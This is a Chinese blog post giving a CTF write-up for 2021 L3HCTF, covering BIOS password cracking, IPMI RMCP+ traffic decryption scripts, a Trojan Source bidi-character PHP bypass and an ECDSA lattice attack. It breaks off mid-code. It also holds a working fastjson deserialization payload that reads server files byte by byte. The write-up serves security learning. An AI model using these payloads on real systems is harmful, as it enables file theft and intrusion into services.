
<!DOCTYPE html>
<html lang="Zh-CN" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>2021-L3HCTF(我愿称其为今年国内最好CTF好伐！！！) SpecialRain-Writeup - 汐白的学习档案</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Xibai,"> 
    <meta name="description" content="这里是正在努力追赶大佬的小可爱QAQ嘤嘤嘤,MiscBootFlag题目给出操作视频和boot固件文件（看完视频猜的主板上的bios固件），看视频可以知道两个密码都是四位的，且题目给出了两个密码的字符范围。
那很明显了，先谷歌一下，随便翻翻，,"> 
    <meta name="author" content="Xibai"> 
    <link rel="alternative" href="atom.xml" title="汐白的学习档案" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
    
    <meta name="twitter:card" content="summary"/>
    <meta name="twitter:title" content="2021-L3HCTF(我愿称其为今年国内最好CTF好伐！！！) SpecialRain-Writeup - 汐白的学习档案"/>
    <meta name="twitter:description" content="这里是正在努力追赶大佬的小可爱QAQ嘤嘤嘤,MiscBootFlag题目给出操作视频和boot固件文件（看完视频猜的主板上的bios固件），看视频可以知道两个密码都是四位的，且题目给出了两个密码的字符范围。
那很明显了，先谷歌一下，随便翻翻，,"/>
    
    
    
    
    <meta property="og:site_name" content="汐白的学习档案"/>
    <meta property="og:type" content="object"/>
    <meta property="og:title" content="2021-L3HCTF(我愿称其为今年国内最好CTF好伐！！！) SpecialRain-Writeup - 汐白的学习档案"/>
    <meta property="og:description" content="这里是正在努力追赶大佬的小可爱QAQ嘤嘤嘤,MiscBootFlag题目给出操作视频和boot固件文件（看完视频猜的主板上的bios固件），看视频可以知道两个密码都是四位的，且题目给出了两个密码的字符范围。
那很明显了，先谷歌一下，随便翻翻，,"/>
    
<link rel="stylesheet" href="/css/diaspora.css">

    <script>window.searchDbPath = "/search.xml";</script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Source+Code+Pro&display=swap" rel="stylesheet">
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">汐白的学习档案</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://xibai.xyz"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">2021-L3HCTF(我愿称其为今年国内最好CTF好伐！！！) SpecialRain-Writeup</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">2021-L3HCTF(我愿称其为今年国内最好CTF好伐！！！) SpecialRain-Writeup</h1>
        <div class="stuff">
            <span>十一月 15, 2021</span>
            
    <!-- <div class=""> -->
      
        <!-- <time datetime="2021-11-15T15:51:11.000Z" itemprop="datePublished"></time> -->
        
        (Updated: <time datetime="2021-11-15T15:51:11.000Z" itemprop="dateModified">2021-11-15</time>)
        
      
    <!-- </div> -->


            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/Writeup/" rel="tag">Writeup</a></li></ul>


        </div>
        <div class="content markdown">
            <h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="BootFlag"><a href="#BootFlag" class="headerlink" title="BootFlag"></a>BootFlag</h3><p>题目给出操作视频和boot固件文件（看完视频猜的主板上的bios固件），看视频可以知道两个密码都是四位的，且题目给出了两个密码的字符范围。</p>
<p>那很明显了，先谷歌一下，随便翻翻，找到一个 UEFI boot 固件的解析工具：<a target="_blank" rel="noopener" href="https://github.com/LongSoft/UEFITool">https://github.com/LongSoft/UEFITool</a> 和 十年前泄露的 BIOS boot 固件源码 还有一个老版本boot密码破解记录：<a target="_blank" rel="noopener" href="https://gist.github.com/en4rab/550880c099b5194fbbf3039e3c8ab6fd">https://gist.github.com/en4rab/550880c099b5194fbbf3039e3c8ab6fd</a></p>
<p>审源码和文章都表示boot密码仅仅进行了一个简单的异或加密，而且<code>BIOS</code>的的密码加密后存储在<code>AMITSESetup</code>块下。<code>AMITSESetup</code>在<code>BIOS</code>块下的<code>AMINvramMainRomAreaGuid</code>下的<code>NVRAM</code>中，记得找后面标注为<code>data</code>的，这个不用解释了吧嘿嘿<br>右键相关条目有查看详细数据和提取功能，数据在<code>body</code>里</p>
<p><img src="https://gitee.com/ye_xi_bai/blogimage/raw/master/blogimages20211115235925.png" alt="20211115235925"></p>
<p>试了下工具，各种参数信息解析的都很完整，只有小部分块数据显示错误。去看了下存密码的位置发现是两串完美的目测<code>sha256</code> 的 32bytes 哈希值，参照源码的异或加密解不出来，而且直接爆了下<code>sha256</code>也不对。无奈又去搜索<code>BIOS</code>、<code>boot</code>、<code>password</code>、<code>hash</code>等关键字找到了：<a target="_blank" rel="noopener" href="https://github.com/ArcadeHustle/X3_USB_softmod/issues/4">https://github.com/ArcadeHustle/X3_USB_softmod/issues/4</a></p>
<p><img src="https://gitee.com/ye_xi_bai/blogimage/raw/master/blogimages20211115180010.png" alt="20211115180010"></p>
<p>去issue利用到的源码仓库里看相关代码：<a target="_blank" rel="noopener" href="https://github.com/raywugithub/zprj/blob/b7c51c9cf4864df6aabb99a1ae843becd577237c/EDK/MiniSetup/PasswordEncode/PasswordEncode.c#L161">https://github.com/raywugithub/zprj/blob/b7c51c9cf4864df6aabb99a1ae843becd577237c/EDK/MiniSetup/PasswordEncode/PasswordEncode.c#L161</a></p>
<p>发现这个版本有sha1和sha256两种hash算法模式以及老版的异或模式，别的没啥太大的差异。</p>
<p><del>这里看了下表十一点半快十二点了出门同学请客吃烧烤，三点回来后疯狂谷歌一下午外加源码审计。</del></p>
<p>其实这里直接脚本爆密码就行了。不过需要注意到<code>MaxSize</code>参数和<code>Password</code>变量的类型处理（相当于<code>UTF-16-LE</code>编码），<code>MaxSize</code>的值为 <code>40bytes</code>，当时脑子抽了审完源码没找到它在哪里被赋值就一直按个人代码习惯当作密码的长度理解了，然后从中午开始困顿，源码就这么点啊，逻辑就这么简单啊，就一个签到难度的代码，咋就爆不出来flag？？？<br>从十一点多困顿到晚上八点突然大悟，谁说<code>MaxSize</code>是密码长度了？那是用到的存储密文的最大空间大小！，浪费整个下午，哭唧唧。</p>
<h3 id="a-sol"><a href="#a-sol" class="headerlink" title="a-sol"></a>a-sol</h3><p>这道题就很有意思了，一开始看见sol，最近刚好在学区块链入门，以为和区块链有关。</p>
<p>然后发现题目是个流量包，打开看看每条流量中携带的数据都不长，搜了手<code>IPMB</code>协议，发现是叫<strong>智能平台管理总线</strong>，中间搜<code>sol</code>和协议的时候不知道咋搜到一个关键字带<code>sol</code>的工业机器人，应该是工业机器人吧，又转去看了下机器人。</p>
<p>过了会在各种搜资料的边角落里看见了<strong>外国不知名小哥的组织利用主板上的该硬件接口实施攻击</strong>的消息。于是大雾，嗷，逮住你了就是这个！</p>
<p>这里本来想偷懒的，看到消息历史都几年前了，想着网上应该能找到现成的工具啥的，顶多魔改下源码就出了。结果搜了半天，别说工具源码，连工具都没搜到，微软倒是拿着工具录了几个演示其危害性的视频。。。无奈大雾</p>
<p>含泪谷歌两三个小时被我找到了别的大佬写的<code>RMCP+</code>流量的解密过程记录文档！<br><a target="_blank" rel="noopener" href="https://github.com/beingj/hash/blob/master/RMCP%2B%20Packet%20decrypt%20and%20authcode.org">https://github.com/beingj/hash/blob/master/RMCP%2B%20Packet%20decrypt%20and%20authcode.org</a><br>爷甚至都去这个协议的官方网站翻去了，硬是没翻出来协议的具体实现规范要求文档，<del>泪了呜呜</del></p>
<p>剩下的就很简单了，文档里写的很详细了，而且这大佬贴出来了它<code>RMCP+</code>协议的规范文档中的一个表名：<code>IPMI SPEC Table</code>，结合他就能搜到<code>RMCP+</code>的详细文档了：<a target="_blank" rel="noopener" href="https://www.intel.com/content/dam/www/public/us/en/documents/product-briefs/ipmi-second-gen-interface-spec-v2-rev1-1.pdf">https://www.intel.com/content/dam/www/public/us/en/documents/product-briefs/ipmi-second-gen-interface-spec-v2-rev1-1.pdf</a></p>
<p>接下来进入照葫芦画瓢解密时间，三级头的爷爷还是很仁慈的，用的默认模式，看了下跟文章里的实例流量用的同样的设置，减少了很多对照pdf查表的时间。</p>
<p>临时写的IPMI.py：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hmac</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">iv = bytes.fromhex(&#x27;829c999137e535bf944ad9f7fddd3a16&#x27;) # IPMI Message data [:16]</span></span><br><span class="line"><span class="string">c = bytes.fromhex(&#x27;fab1bd3339463a9aadb3ad28b4c961bf&#x27;) # IPMI Message data [16:]</span></span><br><span class="line"><span class="string">authcode = bytes.fromhex(&#x27;059b9351f7372d273c792285&#x27;) # IPMI Message[-16:]</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># 完整性算法是HMAC-SHA1-96，机密性算法是AES-CBC-128</span></span><br><span class="line"><span class="string"># 完整性算法 HMAC-SHA1-96 将用于计算 authcode</span></span><br><span class="line"><span class="string"># 机密性算法 AES-CBC-128 将用于解密 IPMI 负载 c</span></span><br><span class="line"><span class="string"># AES-key &lt;- K2[:16] &lt;- SIK</span></span><br><span class="line"><span class="string"># SIK = HMAC KG (Rm | Rc | RoleM | ULengthM | &lt;UNameM&gt;)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Rm = &#x27;a542743a4f194630ca69a7d114adcfec&#x27; # RAKP Message 1 data [9:24]</span></span><br><span class="line"><span class="string">Rc = &#x27;eb30891303f4b3a6c0cb999e373ab240&#x27; # RAKP Message 2 data [9:24]</span></span><br><span class="line"><span class="string">Rolem = &#x27;14&#x27; # RAKP Message 1 data [25]</span></span><br><span class="line"><span class="string">ULengthm = &#x27;05&#x27; # RAKP Message 1 data [28]</span></span><br><span class="line"><span class="string">UNamem = &#x27;61646d696e&#x27; # RAKP Message 1 data [29:44]</span></span><br><span class="line"><span class="string">#KG K[UID] (user password) is “admin” in this session. admin =&gt; ASCII: 61 64 6D 69 6E =&gt; pad to 16 bytes</span></span><br><span class="line"><span class="string">KG=&#x27;61 64 6D 69 6E 00 00 00 00 00 00 00 00 00 00 00&#x27;.replace(&#x27; &#x27;,&#x27;&#x27;)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">SIK = hmac.new(bytes.fromhex(KG),bytes.fromhex(</span></span><br><span class="line"><span class="string">    Rm + Rc + Rolem + ULengthm + UNamem</span></span><br><span class="line"><span class="string">),&#x27;sha1&#x27;)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">print(SIK.hexdigest())</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># K2 = HMAC SIK (const 2) ;</span></span><br><span class="line"><span class="string">Const_2 = &#x27;0202020202020202020202020202020202020202&#x27;</span></span><br><span class="line"><span class="string"># K2 是 HMAC 的结果，数据为“const 2”，密钥为 SIK。</span></span><br><span class="line"><span class="string">K2 = hmac.new(bytes.fromhex(SIK.hexdigest()),bytes.fromhex(Const_2),&#x27;sha1&#x27;)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">print(K2.hexdigest())</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">key = bytes.fromhex(K2.hexdigest())[:16]</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">#IV = bytes.fromhex(&#x27;4173cc04c9077684a3b3ac57f3a8d71d&#x27;)</span></span><br><span class="line"><span class="string">#key = bytes.fromhex(&#x27;d64d9aa86d6202232ef8cbf006319b6b&#x27;)</span></span><br><span class="line"><span class="string">#c = bytes.fromhex(&#x27;a3168b366f3d28b496d339cc2f724436&#x27;)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">aes = AES.new(key,AES.MODE_CBC,iv)</span></span><br><span class="line"><span class="string">print(aes.decrypt(c))</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">IPMI_1</span>():</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>) -&gt; <span class="literal">None</span>:</span><br><span class="line">        self.Const_2 = <span class="built_in">bytes</span>.fromhex(<span class="string">&#x27;0202020202020202020202020202020202020202&#x27;</span>)</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">setRm</span>(<span class="params">self,data</span>):</span><br><span class="line">        self.Rm = data[<span class="number">8</span>:<span class="number">24</span>]</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">setRc</span>(<span class="params">self,data</span>):</span><br><span class="line">        self.Rc = data[<span class="number">8</span>:<span class="number">24</span>]</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">setRolem</span>(<span class="params">self,data</span>):</span><br><span class="line">        self.Rolem = data[<span class="number">24</span>:<span class="number">25</span>]</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">setULengthm</span>(<span class="params">self,data</span>):</span><br><span class="line">        self.ULengthm = data[<span class="number">27</span>:<span class="number">28</span>]</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">setUNamem</span>(<span class="params">self,data</span>):</span><br><span class="line">        self.UNamem = data[<span class="number">28</span>:<span class="number">33</span>]</span><br><span class="line">        self.KG = self.UNamem + <span class="string">b&#x27;\x00&#x27;</span> * <span class="number">11</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">getKey</span>(<span class="params">self</span>):</span><br><span class="line">        self.SIK = hmac.new(self.KG,self.Rm + self.Rc + self.Rolem + self.ULengthm + self.UNamem,<span class="string">&#x27;sha1&#x27;</span>).hexdigest()</span><br><span class="line">        self.K2 = hmac.new(<span class="built_in">bytes</span>.fromhex(self.SIK),self.Const_2,<span class="string">&#x27;sha1&#x27;</span>).hexdigest()</span><br><span class="line">        key = <span class="built_in">bytes</span>.fromhex(self.K2)[:<span class="number">16</span>]</span><br><span class="line">        <span class="keyword">return</span> key</span><br></pre></td></tr></table></figure>
<p>和流量解密脚本，flag.py：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pyshark</span><br><span class="line"><span class="keyword">from</span> IPMI <span class="keyword">import</span> IPMI_1</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"></span><br><span class="line">cap = pyshark.FileCapture(<span class="string">&#x27;3.pcapng&#x27;</span>)</span><br><span class="line">ipmi = IPMI_1()</span><br><span class="line"><span class="keyword">global</span> key</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> cap:</span><br><span class="line">    ipmi_session = i.ipmi_session</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;payloadtype&#x27;</span> <span class="keyword">in</span> <span class="built_in">dir</span>(ipmi_session):</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 前两个 if 初始化各个关键值</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;0x00000012&#x27;</span> == ipmi_session.payloadtype:</span><br><span class="line">            data = <span class="built_in">bytes</span>.fromhex(i.data.data)</span><br><span class="line">            ipmi.setRm(data)</span><br><span class="line">            ipmi.setULengthm(data)</span><br><span class="line">            ipmi.setRolem(data)</span><br><span class="line">            ipmi.setUNamem(data)</span><br><span class="line">        <span class="keyword">elif</span> <span class="string">&#x27;0x00000013&#x27;</span> == ipmi_session.payloadtype:</span><br><span class="line">            data = <span class="built_in">bytes</span>.fromhex(i.data.data)</span><br><span class="line">            ipmi.setRc(data)</span><br><span class="line">            key = ipmi.getKey()</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 解密消息</span></span><br><span class="line">        <span class="keyword">elif</span> <span class="string">&#x27;0x00000001&#x27;</span> == ipmi_session.payloadtype:</span><br><span class="line">            data = <span class="built_in">bytes</span>.fromhex(i.data.data)</span><br><span class="line">            iv = data[:<span class="number">16</span>]</span><br><span class="line">            c = data[<span class="number">16</span>:]</span><br><span class="line">            aes = AES.new(key,AES.MODE_CBC,iv)</span><br><span class="line">            m = aes.decrypt(c)</span><br><span class="line">            length = m[-<span class="number">1</span>]</span><br><span class="line">            m = m[:-<span class="number">1</span>-length]</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                <span class="built_in">print</span>(m[<span class="number">4</span>:].decode())</span><br><span class="line">            <span class="keyword">except</span>:</span><br><span class="line">                <span class="built_in">print</span>(m[<span class="number">4</span>:])</span><br><span class="line">            <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">            for i in m:</span></span><br><span class="line"><span class="string">                if i &gt; 32 and i &lt; 128:</span></span><br><span class="line"><span class="string">                    print(chr(i),end=&#x27;&#x27;)&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="cover"><a href="#cover" class="headerlink" title="cover"></a>cover</h3><p><del>高冷的cop师傅前半夜看见了一个完美rce的条件调了整个前半夜，然后放弃了那个最后发现其实没办法用的rce2333</del></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> requests </span><br><span class="line">s =  requests.session()</span><br><span class="line">flags=<span class="string">&quot;76,51,72,67,84,70,123,99,111,118,51,114,95,109,101,97,110,115,95,100,105,115,99,111,118,101,114,95,52,110,100,95,107,49,108,108&quot;</span></span><br><span class="line">flag=<span class="string">&quot;L3HCTF&#123;cov3r_means_discover_4nd_k1ll&quot;</span></span><br><span class="line">proxies = &#123;</span><br><span class="line">    <span class="string">&quot;http&quot;</span>:<span class="string">&quot;http://127.0.0.1:8080&quot;</span></span><br><span class="line">&#125;</span><br><span class="line">url = <span class="string">&quot;http://124.71.173.23:8088&quot;</span></span><br><span class="line">s.post(url+<span class="string">&quot;/login&quot;</span>,data=&#123;<span class="string">&quot;userName&quot;</span>:<span class="string">&quot;admin&quot;</span>,<span class="string">&quot;password&quot;</span>:<span class="string">&quot;123456&quot;</span>,<span class="string">&quot;email&quot;</span>:<span class="string">&quot;&quot;</span>&#125;)</span><br><span class="line">str1=string.ascii_letters+string.digits+string.punctuation</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">30</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str1:</span><br><span class="line">        <span class="comment">#print(str(ord(j)))</span></span><br><span class="line">        <span class="comment">#flags=str(j)</span></span><br><span class="line">        data=<span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">[&#123;</span></span><br><span class="line"><span class="string">&quot;age&quot;:&#123;        &quot;abc&quot;: &#123;</span></span><br><span class="line"><span class="string">                &quot;@type&quot;: &quot;java.lang.AutoCloseable&quot;,</span></span><br><span class="line"><span class="string">                &quot;@type&quot;: &quot;org.apache.commons.io.input.BOMInputStream&quot;,</span></span><br><span class="line"><span class="string">                &quot;delegate&quot;: &#123;</span></span><br><span class="line"><span class="string">                        &quot;@type&quot;: &quot;org.apache.commons.io.input.ReaderInputStream&quot;,</span></span><br><span class="line"><span class="string">                        &quot;reader&quot;: &#123;</span></span><br><span class="line"><span class="string">                                &quot;@type&quot;: &quot;jdk.nashorn.api.scripting.URLReader&quot;,</span></span><br><span class="line"><span class="string">                                &quot;url&quot;: &quot;file:///flag&quot;</span></span><br><span class="line"><span class="string">                        &#125;,</span></span><br><span class="line"><span class="string">                        &quot;charsetName&quot;: &quot;UTF-8&quot;,</span></span><br><span class="line"><span class="string">                        &quot;bufferSize&quot;: 1024</span></span><br><span class="line"><span class="string">                &#125;,</span></span><br><span class="line"><span class="string">                &quot;boms&quot;: [</span></span><br><span class="line"><span class="string">                        &#123;</span></span><br><span class="line"><span class="string">                                &quot;charsetName&quot;: &quot;UTF-8&quot;,</span></span><br><span class="line"><span class="string">                                &quot;bytes&quot;: [</span></span><br><span class="line"><span class="string">                                        &quot;&quot;&quot;</span>+flags+<span class="string">&quot;,&quot;</span>+<span class="built_in">str</span>(<span class="built_in">ord</span>(j))+<span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">                                ]</span></span><br><span class="line"><span class="string">                        &#125;</span></span><br><span class="line"><span class="string">                ]</span></span><br><span class="line"><span class="string">        &#125;,</span></span><br><span class="line"><span class="string">        &quot;address&quot;: &#123;</span></span><br><span class="line"><span class="string">                &quot;$ref&quot;: &quot;$[0].abc.BOM&quot;</span></span><br><span class="line"><span class="string">        &#125;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">&#125;]&quot;&quot;&quot;</span></span><br><span class="line">        <span class="comment">#print(flags)</span></span><br><span class="line">        r = s.post(url+<span class="string">&quot;/dynamic_table&quot;</span>,data=&#123;<span class="string">&quot;data&quot;</span>:data&#125;)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;bOMCharsetName&quot;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            flags+=<span class="string">&quot;,&quot;</span>+<span class="built_in">str</span>(<span class="built_in">ord</span>(j))</span><br><span class="line">            flag+=j</span><br><span class="line">            <span class="built_in">print</span>(flags)</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<h3 id="image-server1"><a href="#image-server1" class="headerlink" title="image server1"></a>image server1</h3><p>大小写绕过搜到flag</p>
<h3 id="Easy-php"><a href="#Easy-php" class="headerlink" title="Easy php"></a>Easy php</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="string">&quot;admin&quot;</span> == <span class="variable">$_GET</span>[username] &amp;‮⁦+!!⁩⁦&amp; <span class="string">&quot;‮⁦CTF⁩⁦l3hctf&quot;</span> == <span class="variable">$_GET</span>[‮⁦L3H⁩⁦password]) &#123; <span class="comment">//Welcome to </span></span><br><span class="line">    <span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;  </span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>
<p>可以发现其中有控制字符</p>
<p><img src="D:\HexoBlog\source\images\easyphp\image-20211115172143482.png" alt="image-20211115172143482" style="zoom:50%;" /></p>
<p>将对应的字符编码并完整提交：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://124.71.176.131:10001/?username=admin&amp;%E2%80%AE%E2%81%A6L3H%E2%81%A9%E2%81%A6password=%E2%80%AE%E2%81%A6CTF%E2%81%A9%E2%81%A6l3hctf</span><br></pre></td></tr></table></figure>
<p>获得flag。flag{Y0U_F0UND_CVE-2021-42574!}</p>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="EZecdsa"><a href="#EZecdsa" class="headerlink" title="EZecdsa"></a>EZecdsa</h3><p>正常的一个ecdsa签名，也没有存在随机数k复用的情况，但是每次的随机数k会给低8位，所以很容易能找到相关的paper，但是paper写的有点晦涩难懂，总之是个HNP问题，然后找到一个有具体实现的回答：<a target="_blank" rel="noopener" href="https://crypto.stackexchange.com/questions/44644/how-does-the-biased-k-attack-on-ecdsa-work">https://crypto.stackexchange.com/questions/44644/how-does-the-biased-k-attack-on-ecdsa-work</a><br><img src="https://gitee.com/ye_xi_bai/blogimage/raw/master/blogimages20211115233022.png" alt="20211115233022"></p>
<p>利用这个格子做，我是让ST=SU=1这样当格约出来的短向量最后一个为1时，倒数第二个就是私钥d，但是呢有点毛病，这样的话有些不足，也就是说存在一定概率才能出，在本地能通之后，直接远程炼丹了。</p>
<p><img src="https://gitee.com/ye_xi_bai/blogimage/raw/master/blogimages20211115233043.png" alt="20211115233043"></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span 